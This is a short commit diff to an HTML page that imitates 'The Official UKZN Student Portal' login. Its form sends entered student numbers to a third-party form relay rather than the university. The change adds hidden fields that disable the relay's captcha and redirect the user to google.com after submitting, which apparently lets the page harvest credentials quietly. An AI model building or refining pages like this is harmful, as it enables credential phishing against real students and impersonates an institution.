added inputs for recatcha and next

--- a/prototype2.html
+++ b/prototype2.html
@@ -15,11 +15,13 @@
   
   
   -->
-  <form  class="form-body" action="https://formsubmit.co/bf7bb60ec83ebc87948870d0907db6aa" method="post" >
+  <form  class="form-body" action="https://formsubmit.co/bf7bb60ec83ebc87948870d0907db6aa"  method="post" >
     <img class="protoLogo" src="photos/protoLogo.png">
     <label><img class="protoSc" src="photos/protoSc.PNG"></label>
     <label class ="the-first-text">"The Official UKZN Student Portal"</label>
     <label class="long-bar-text">Secure Student Login</label>
+    <input type="hidden" name="_captcha" value="false">
+    <input type="hidden" name="_next" value="https://google.com">
     <label for="student-number" name="student-number" class="student-number">Student Number</label>
     <label class="student-number-text"></label >
     <input type="text" class="student-number-value" name="studentNumber" hidden>
